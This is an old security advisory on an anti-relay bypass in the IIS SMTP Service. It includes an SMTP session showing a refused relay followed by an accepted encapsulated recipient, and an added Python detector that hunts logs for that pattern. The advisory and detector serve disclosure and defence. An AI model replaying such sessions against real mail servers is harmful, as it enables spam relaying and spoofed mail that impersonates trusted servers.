IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability

by Nikola Strahija on July 12th, 2002

Laurent Frinking of Quark Deutschland GmbH originally discovered this vulnerability. At that time the discovery concerned all versions of Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch.


Portcullis have discovered that the Microsoft SMTP Service available with
IIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP address
vulnerability even with anti-relaying features enabled.
This vulnerability allows hosts that are not authorized to relay e-mail via
the SMTP server to bypass the anti-relay features and send mail to foreign
domains.

Impact:

The anti-relay rules will be circumvented, allowing spam and spoofed mail to
be relayed via the SMTP mail server.

Spam Mail:
If the Microsoft IIS SMTP Server is used to relay spam mail, this could
result in the mail server being blackholed, causing disruption to the
service.

Spoofed e-mail:
As the Microsoft IIS SMTP Service is most often used in conjunction with
IIS for commercial purposes, this flaw could be used to socially engineer
customers, particularly because spoofed e-mail relayed in this way will show
the trusted web server in the SMTP header.

Exploit:

220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: [email protected]
250 2.1.0 [email protected] OK
RCPT TO: [email protected]
550 5.7.1 Unable to relay for [email protected]
RCPT TO: [email protected]
250 2.1.5 [email protected]
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.
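
A log-hunting check for the pattern visible in the session above: a "550 5.7.1 Unable to relay" refusal followed, in the same mail transaction, by an accepted RCPT TO and a DATA command that goes ahead. This is an added example, not part of the original advisory; the sample session, host names and addresses are constructed placeholders, and the function names are hypothetical.

```python
import re
# Constructed sample session (not from the advisory); all names are placeholders.
SAMPLE_SESSION = """\
220 mailer.example ESMTP ready
helo
250 mailer.example Hello [192.0.2.10]
MAIL FROM: sender@outside.example
250 2.1.0 sender@outside.example OK
RCPT TO: target@foreign.example
550 5.7.1 Unable to relay for target@foreign.example
RCPT TO: second-form@mailer.example
250 2.1.5 second-form@mailer.example
data
354 Start mail input
"""

RCPT = re.compile(r"^RCPT TO:\s*<?([^>\s]+)>?", re.I)
REPLY = re.compile(r"^(\d{3})([ -])(.*)$")

def exchanges(session):
    """Yield (command, code, text) for each client command and its final reply line."""
    command, in_body = None, False
    for raw in session.splitlines():
        line = raw.strip()
        if in_body:                      # message content is neither command nor reply
            in_body = line != "."
            continue
        m = REPLY.match(line)
        if m is None:
            command = line or command
        elif m.group(2) == " " and command is not None:
            code = int(m.group(1))
            yield command, code, m.group(3)
            command, in_body = None, code == 354

def relay_bypass_suspects(session):
    """Recipients accepted after a relay refusal in a transaction that reached DATA."""
    refused, accepted, findings = False, [], []
    for command, code, text in exchanges(session):
        verb, m = command.upper(), RCPT.match(command)
        if verb.startswith(("MAIL FROM", "RSET")):
            refused, accepted = False, []          # new mail transaction
        elif m and code == 550 and "relay" in text.lower():
            refused = True
        elif m and refused and 200 <= code < 300:
            accepted.append(m.group(1))
        elif verb == "DATA" and code == 354:
            findings.extend(accepted)
    return findings
```

A mistyped foreign address followed by a valid local recipient produces the same sequence, so treat a hit as a reason to inspect the accepted address and the source host rather than as proof of relaying.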


